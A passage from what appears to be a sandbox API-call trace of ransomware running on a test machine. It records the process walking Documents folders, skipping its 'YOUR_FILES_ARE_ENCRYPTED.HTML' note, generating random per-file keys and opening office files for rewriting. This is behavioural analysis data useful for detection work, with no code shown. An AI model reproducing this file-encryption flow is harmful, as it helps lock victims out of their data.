param_2="%02X" | out: param_1="D8") returned 2 [0124.180] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="A8") returned 2 [0124.180] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="7C") returned 2 [0124.180] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="A1") returned 2 [0124.180] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="04") returned 2 [0124.180] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="44") returned 2 [0124.180] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="F7") returned 2 [0124.180] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="93") returned 2 [0124.180] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="15") returned 2 [0124.180] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="C8") returned 2 [0124.180] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="46") returned 2 [0124.181] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="D9") returned 2 [0124.181] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="CA") returned 2 [0124.181] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="9C") returned 2 [0124.181] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="88") returned 2 [0124.181] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="7B") returned 2 [0124.181] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="A8") returned 2 [0124.181] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="3A") returned 2 [0124.181] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="7D") returned 2 [0124.181] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps" [0124.181] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.181] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.185] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d9e7c50, ftCreationTime.dwHighDateTime=0x1d702b6, ftLastAccessTime.dwLowDateTime=0x6210d5b0, ftLastAccessTime.dwHighDateTime=0x1d70a79, ftLastWriteTime.dwLowDateTime=0x6210d5b0, ftLastWriteTime.dwHighDateTime=0x1d70a79, nFileSizeHigh=0x0, nFileSizeLow=0x15d51, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="MkuxZMma_cNUC_9MvGev.xlsx", cAlternateFileName="MKUXZM~1.XLS")) returned 1 [0124.185] StrStrIW (lpFirst="MkuxZMma_cNUC_9MvGev.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.185] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx") returned 86 [0124.185] PathFindExtensionW (pszPath="MkuxZMma_cNUC_9MvGev.xlsx") returned=".xlsx" [0124.185] lstrlenW (lpString=".xlsx") returned 5 [0124.185] PathFindExtensionW (pszPath="MkuxZMma_cNUC_9MvGev.xlsx") returned=".xlsx" [0124.185] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\mkuxzmma_cnuc_9mvgev.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.186] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=89425) returned 1 [0124.186] GetProcessHeap () returned 0x600000 [0124.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.186] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="55") returned 2 [0124.186] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="0E") returned 2 [0124.186] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="1E") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="14") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="5C") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="19") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="2F") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="B5") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="D7") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="AE") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="5A") returned 2 [0124.187] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="1F") returned 2 [0124.187] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="A9") returned 2 [0124.187] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="F1") returned 2 [0124.187] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="06") returned 2 [0124.187] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="0F") returned 2 [0124.187] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="58") returned 2 [0124.187] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="54") returned 2 [0124.187] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="E8") returned 2 [0124.187] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="C6") returned 2 [0124.187] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="8E") returned 2 [0124.187] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="59") returned 2 [0124.187] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="9E") returned 2 [0124.187] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="E0") returned 2 [0124.187] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="39") returned 2 [0124.187] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="9B") returned 2 [0124.187] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="71") returned 2 [0124.187] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="44") returned 2 [0124.187] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="29") returned 2 [0124.187] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="4E") returned 2 [0124.187] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="9C") returned 2 [0124.187] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="13") returned 2 [0124.188] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\MkuxZMma_cNUC_9MvGev.xlsx" [0124.188] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.188] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.191] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24943590, ftCreationTime.dwHighDateTime=0x1d6fd42, ftLastAccessTime.dwLowDateTime=0x1b0a0b90, ftLastAccessTime.dwHighDateTime=0x1d700b6, ftLastWriteTime.dwLowDateTime=0x1b0a0b90, ftLastWriteTime.dwHighDateTime=0x1d700b6, nFileSizeHigh=0x0, nFileSizeLow=0xc325, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="V24qPsKNM.xlsx", cAlternateFileName="V24QPS~1.XLS")) returned 1 [0124.191] StrStrIW (lpFirst="V24qPsKNM.xlsx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.191] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx") returned 75 [0124.191] PathFindExtensionW (pszPath="V24qPsKNM.xlsx") returned=".xlsx" [0124.191] lstrlenW (lpString=".xlsx") returned 5 [0124.191] PathFindExtensionW (pszPath="V24qPsKNM.xlsx") returned=".xlsx" [0124.191] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\v24qpsknm.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.192] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=49957) returned 1 [0124.192] GetProcessHeap () returned 0x600000 [0124.192] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.193] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="D8") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="9B") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="0F") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="CC") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="81") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="6F") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="5F") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="D4") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="12") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="45") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="BC") returned 2 [0124.193] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="7E") returned 2 [0124.193] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="1E") returned 2 [0124.193] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="B1") returned 2 [0124.193] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="51") returned 2 [0124.193] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="E8") returned 2 [0124.193] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="D1") returned 2 [0124.193] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="F1") returned 2 [0124.193] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="E8") returned 2 [0124.193] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="4E") returned 2 [0124.193] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="C5") returned 2 [0124.193] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="14") returned 2 [0124.193] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="72") returned 2 [0124.193] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="62") returned 2 [0124.193] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="23") returned 2 [0124.193] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="3A") returned 2 [0124.193] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="6E") returned 2 [0124.193] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="40") returned 2 [0124.193] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="3B") returned 2 [0124.193] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="3A") returned 2 [0124.193] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="D2") returned 2 [0124.193] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4B") returned 2 [0124.194] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\V24qPsKNM.xlsx" [0124.194] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.194] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.199] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x481e3c00, ftCreationTime.dwHighDateTime=0x1d6fa35, ftLastAccessTime.dwLowDateTime=0x3d8ae190, ftLastAccessTime.dwHighDateTime=0x1d70029, ftLastWriteTime.dwLowDateTime=0x3d8ae190, ftLastWriteTime.dwHighDateTime=0x1d70029, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="yV-YjYmMWnm1AyayTG1", cAlternateFileName="YV-YJY~1")) returned 1 [0124.199] StrStrIW (lpFirst="yV-YjYmMWnm1AyayTG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.199] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1") returned 80 [0124.199] GetProcessHeap () returned 0x600000 [0124.199] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0124.199] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1" [0124.200] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\*" [0124.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x481e3c00, ftCreationTime.dwHighDateTime=0x1d6fa35, ftLastAccessTime.dwLowDateTime=0x3d8ae190, ftLastAccessTime.dwHighDateTime=0x1d70029, ftLastWriteTime.dwLowDateTime=0x3d8ae190, ftLastWriteTime.dwHighDateTime=0x1d70029, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName=".", cAlternateFileName="")) returned 0x626738 [0124.200] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x481e3c00, ftCreationTime.dwHighDateTime=0x1d6fa35, ftLastAccessTime.dwLowDateTime=0x3d8ae190, ftLastAccessTime.dwHighDateTime=0x1d70029, ftLastWriteTime.dwLowDateTime=0x3d8ae190, ftLastWriteTime.dwHighDateTime=0x1d70029, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="..", cAlternateFileName="")) returned 1 [0124.200] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x476c4520, ftCreationTime.dwHighDateTime=0x1d6fd2a, ftLastAccessTime.dwLowDateTime=0xfc0b73b0, ftLastAccessTime.dwHighDateTime=0x1d706c2, ftLastWriteTime.dwLowDateTime=0xfc0b73b0, ftLastWriteTime.dwHighDateTime=0x1d706c2, nFileSizeHigh=0x0, nFileSizeLow=0x358e, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="34K1b7f7WFd2prM.odt", cAlternateFileName="34K1B7~1.ODT")) returned 1 [0124.200] StrStrIW (lpFirst="34K1b7f7WFd2prM.odt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.200] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt") returned 100 [0124.200] PathFindExtensionW (pszPath="34K1b7f7WFd2prM.odt") returned=".odt" [0124.200] lstrlenW (lpString=".odt") returned 4 [0124.200] PathFindExtensionW (pszPath="34K1b7f7WFd2prM.odt") returned=".odt" [0124.200] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\yv-yjymmwnm1ayaytg1\\34k1b7f7wfd2prm.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.200] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=13710) returned 1 [0124.201] GetProcessHeap () returned 0x600000 [0124.201] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.203] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="FB") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="64") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="2D") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="E3") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="9F") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="76") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="D9") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="E0") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="00") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="BA") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="87") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="01") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="8A") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="14") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="7C") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="5D") returned 2 [0124.203] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="54") returned 2 [0124.203] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="C6") returned 2 [0124.203] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="7D") returned 2 [0124.203] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="33") returned 2 [0124.203] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="4D") returned 2 [0124.203] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="2E") returned 2 [0124.203] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="E1") returned 2 [0124.204] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="03") returned 2 [0124.204] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="BC") returned 2 [0124.204] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="27") returned 2 [0124.204] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="53") returned 2 [0124.204] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="A8") returned 2 [0124.204] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="32") returned 2 [0124.204] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="52") returned 2 [0124.204] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="9D") returned 2 [0124.204] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="7C") returned 2 [0124.204] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\34K1b7f7WFd2prM.odt" [0124.204] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.204] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.208] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4facf40, ftCreationTime.dwHighDateTime=0x1d6fd58, ftLastAccessTime.dwLowDateTime=0x19748f20, ftLastAccessTime.dwHighDateTime=0x1d6fea0, ftLastWriteTime.dwLowDateTime=0x19748f20, ftLastWriteTime.dwHighDateTime=0x1d6fea0, nFileSizeHigh=0x0, nFileSizeLow=0xd238, dwReserved0=0x19e638, dwReserved1=0xfd726815, cFileName="bm6qnx1dPRVSkB-soihF.doc", cAlternateFileName="BM6QNX~1.DOC")) returned 1 [0124.208] StrStrIW (lpFirst="bm6qnx1dPRVSkB-soihF.doc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.208] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc") returned 105 [0124.208] PathFindExtensionW (pszPath="bm6qnx1dPRVSkB-soihF.doc") returned=".doc" [0124.208] lstrlenW (lpString=".doc") returned 4 [0124.208] PathFindExtensionW (pszPath="bm6qnx1dPRVSkB-soihF.doc") returned=".doc" [0124.208] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\yV-YjYmMWnm1AyayTG1\\bm6qnx1dPRVSkB-soihF.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\yv-yjymmwnm1ayaytg1\\bm6qnx1dprvskb-soihf.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0124.209] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=53816) returned 1 [0124.209] GetProcessHeap () returned 0x600000 [0124.209] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.209] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="A9") returned 2 [0124.209] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="84") returned 2 [0124.209] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="1E") returned 2 [0124.209] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="80") returned 2 [0124.209] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="5A") returned 2 [0124.209] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="9C") returned 2 [0124.209] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="16") returned 2 [0124.209] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="29") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="07") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="7A") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="FB") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="1E") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="5E") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="FE") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="A7") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="72") returned 2 [0124.210] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: 